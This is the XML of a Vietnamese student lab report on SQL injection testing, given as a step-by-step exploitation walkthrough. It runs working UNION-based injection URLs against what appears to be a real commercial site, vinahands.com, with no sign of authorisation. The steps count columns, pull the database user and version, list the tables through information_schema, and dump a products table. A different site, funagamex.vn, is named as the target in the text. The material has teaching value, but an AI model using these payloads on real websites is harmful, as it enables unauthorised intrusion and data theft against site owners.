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1C8" w:rsidRPr="004C61C8" w:rsidRDefault="004C61C8" w:rsidP="004C61C8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C61C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BÁO CÁO BÀI THỰC HÀNH SỐ 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00977109" w:rsidRDefault="004C61C8" w:rsidP="004C61C8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C61C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>KIỂM THỬ LỖ HỔNG SQL INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C61C8" w:rsidRPr="004C61C8" w:rsidRDefault="004C61C8" w:rsidP="004C61C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C61C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Họ và Tên: Nguyễn Thanh Ý</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C61C8" w:rsidRDefault="004C61C8" w:rsidP="004C61C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C61C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>MSSV: 0850080056</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C61C8" w:rsidRDefault="004C61C8" w:rsidP="004C61C8">
      <w:r>
        <w:t xml:space="preserve">Kiểm thử lổ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="004C61C8">
        <w:t xml:space="preserve">SQL Injection trên trang web </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00354FEF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://funagamex.vn/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004C61C8" w:rsidRDefault="00CF3D24" w:rsidP="00CF3D24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kiểm tra trang web có bị lỗ hổng SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="004C61C8">
        <w:t>Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hay không, sử dụng url `</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3D24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3D24">
        <w:t>https://www.vinahands.com/cat.php?id=1%</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3D24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>` dưới đây là kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3D24" w:rsidRDefault="00CF3D24" w:rsidP="003D0864">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF3D24">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33A09FB3" wp14:editId="52EC31A0">
            <wp:extent cx="5943600" cy="1866265"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="125401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10556" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1866265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3D24" w:rsidRDefault="00CF3D24" w:rsidP="00CF3D24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tiếp theo lấy tìm số cột dữ liệu của bảng đang bị lỗi để có thể nhúng các câu truy vấn ở các bước sau bằng url `</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3D24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3D24">
        <w:t>https://www.vinahands.com/cat.php?id=-1 order by 1-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3D24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">` dưới đây là kết quả: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3D24" w:rsidRDefault="00CF3D24" w:rsidP="003D0864">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF3D24">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EF0C3D2" wp14:editId="3758EE72">
            <wp:extent cx="5943600" cy="2089150"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="185123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4879" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2089150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3D24" w:rsidRDefault="00CF3D24" w:rsidP="00CF3D24">
      <w:r>
        <w:t>Điều này có nghĩa là số cột của table nhiều hơn 1, tiếp tục tăng tới khi vào xuất hiện lỗi như hình 1, và đây là url khi nhận được lỗi `</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3D24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3D24">
        <w:t>https://www.vinahands.com/cat.php?id=-1 order by 7-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3D24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>`, nghĩa là bảng này có 6 cột</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3D24" w:rsidRDefault="00CF3D24" w:rsidP="00CF3D24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sau khi có số cột chúng cha sẽ chạy tiếp url `</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3D24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3D24">
        <w:t>https://www.vinahands.com/cat.php?id=-1 union select 1,2,3,4,5,6-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3D24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">` với </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1,2,3,4,5,6 là thứ tự tăng dần của số cột. Với url này sẽ xuất hiện </w:t>
      </w:r>
      <w:r w:rsidR="003D0864">
        <w:t>cột 3 bị lỗi, và đây cũng chính là cột chúng ta có thể chèn các câu lệnh sql để truy vấn dữ liệu, như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:r w:rsidRPr="003D0864">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D5DA093" wp14:editId="545AC171">
            <wp:extent cx="5943600" cy="1080770"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="18964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4405" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1080770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3D24" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tiếp theo chúng ta sẽ truy xuất 1 số thông tin cơ bản của hệ thống như “user()”, “database”, “version()” bằng các url sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0864">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0864">
        <w:t>https://www.vinahands.com/cat.php?id=-1 union select 1,2,user(),4,5,6-- -</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003D0864">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AAEAD76" wp14:editId="082BDB7E">
            <wp:extent cx="5189670" cy="2004234"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14997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20445" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5189670" cy="2004234"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0864">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0864">
        <w:t>https://www.vinahands.com/cat.php?id=-1 union select 1,2,database(),4,5,6-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0864">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003D0864">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10690F75" wp14:editId="6666B344">
            <wp:extent cx="5943600" cy="1780540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="82581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3804" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1780540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0864">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0864">
        <w:t>https://www.vinahands.com/cat.php?id=-1 union select 1,2,version(),4,5,6-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0864">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003D0864">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FBB3BBC" wp14:editId="1C4D705B">
            <wp:extent cx="4884843" cy="1966130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="97722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20555" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4884843" cy="1966130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sau khi có các thông tin cơ bản, ta sẽ lấy hết toàn bộ tên của các bảng từ hệ thống bằng url sau `</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0864">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0864">
        <w:t>https://www.vinahands.com/cat.php?id=-1 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema= database();-- -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">` </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:r w:rsidRPr="003D0864">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F801250" wp14:editId="587A4A53">
            <wp:extent cx="5943600" cy="2448560"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="204943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37143" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2448560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nhpEN_cat, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nhpEN_daily,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nhpEN_feedback,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nhpEN_html,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nhpEN_news,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nhpEN_news2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nhpEN_news3,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nhpEN_news4,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nhpEN_news5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nhpEN_picture,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nhpEN_products,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nhpEN_scategory,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>nhpEN_spbanchay,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nhpEN_topic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0864" w:rsidRDefault="003D0864" w:rsidP="003D0864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau khi lấy được tên các bảng, chúng ta có thể lấy được tên các column của từng bảng, ví dụ ở đây em sẽ lấy tên các column từ bảng </w:t>
      </w:r>
      <w:r>
        <w:t>nhpEN_products</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bằng url sau `</w:t>
      </w:r>
      <w:r w:rsidR="00754007" w:rsidRPr="00754007">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00754007" w:rsidRPr="00754007">
        <w:t>https://www.vinahands.com/cat.php?id=-1 union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name= 0x6e6870454e5f70726f6475637473;-- -</w:t>
      </w:r>
      <w:r w:rsidR="00754007" w:rsidRPr="00754007">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidR="00754007">
        <w:t xml:space="preserve"> với </w:t>
      </w:r>
      <w:r w:rsidR="00754007" w:rsidRPr="00754007">
        <w:t>0x6e6870454e5f70726f6475637473</w:t>
      </w:r>
      <w:r w:rsidR="00754007">
        <w:t xml:space="preserve"> là mã Hex của tên bảng </w:t>
      </w:r>
      <w:r w:rsidR="00754007">
        <w:t>nhpEN_products</w:t>
      </w:r>
      <w:r w:rsidR="00754007">
        <w:t xml:space="preserve">, và đây là kết quả: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00754007" w:rsidRDefault="00754007" w:rsidP="00754007">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00754007">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10AA0AAC" wp14:editId="68728574">
            <wp:extent cx="5943600" cy="1925320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="87143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0830" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1925320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00754007" w:rsidRDefault="00754007" w:rsidP="00754007">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sau khi có các cột của tên bảng, ta có thể truy xuất dữ liệu từ bảng bằng url sau `</w:t>
      </w:r>
      <w:r w:rsidRPr="00754007">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00754007">
        <w:t>https://www.vinahands.com/cat.php?id=-1 union select 1,2,group_concat(id,cID,tenSP,thongTin,gia,code),4,5,6 from nhpEN_products-- -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">` bởi vì lần này chúng ta chỉ đính danh bảng và các cột của nó nên không cần phải mã hoá hex nữa, và đây là kết quả: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00754007" w:rsidRDefault="00754007" w:rsidP="00754007">
      <w:r w:rsidRPr="00754007">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C7E5867" wp14:editId="3CDF2BC5">
            <wp:extent cx="5943600" cy="3993515"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="212585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5757" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3993515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00754007" w:rsidRPr="004C61C8" w:rsidRDefault="00754007" w:rsidP="00754007">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Em vừa với lợi dụng lỗi </w:t>
      </w:r>
      <w:r w:rsidRPr="004C61C8">
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để truy xuất thông tin, user, database, dữ liệu các bảng của 1 hệ thống 1 cách dễ dàng. Nhưng bởi vì website này không có tính nay đăng nhập hoặc không lưu trữ dữ liệu đăng nhập của hệ thống trong database, nên em không thể lấy dữ liệu của quản trị. Vì vậy lỗi </w:t>
      </w:r>
      <w:r w:rsidRPr="004C61C8">
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là một lỗi nghiêm trọng và phổ biến khi người dùng sử dụng các các truy vấn SQL cơ bản để truy vấn dữ liệu, nên việc phòng vệ và trác các lỗi liên quan đến </w:t>
      </w:r>
      <w:r w:rsidRPr="004C61C8">
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là 1 điều cần thiết với nhà phát triển phần mềm.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00754007" w:rsidRPr="004C6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5892"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="24EA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EE73A39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8104E0C6"/>
    <w:lvl w:ilvl="0" w:tplc="86503E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55C0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="549C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3B6BF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74985E2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AE10A63"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2892ED06"/>
    <w:lvl w:ilvl="0" w:tplc="DB7CDC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A7085"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38B0099A"/>
    <w:lvl w:ilvl="0" w:tplc="49ACE0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E06D51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A02C3EC0"/>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57514824">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="890651157">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="932929906">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="414791531">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2075814910">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1545363805">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="669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1C8"/>
    <w:rsid w:val="00035563"/>
    <w:rsid w:val="001145D0"/>
    <w:rsid w:val="003B675B"/>
    <w:rsid w:val="003D0864"/>
    <w:rsid w:val="004C61C8"/>
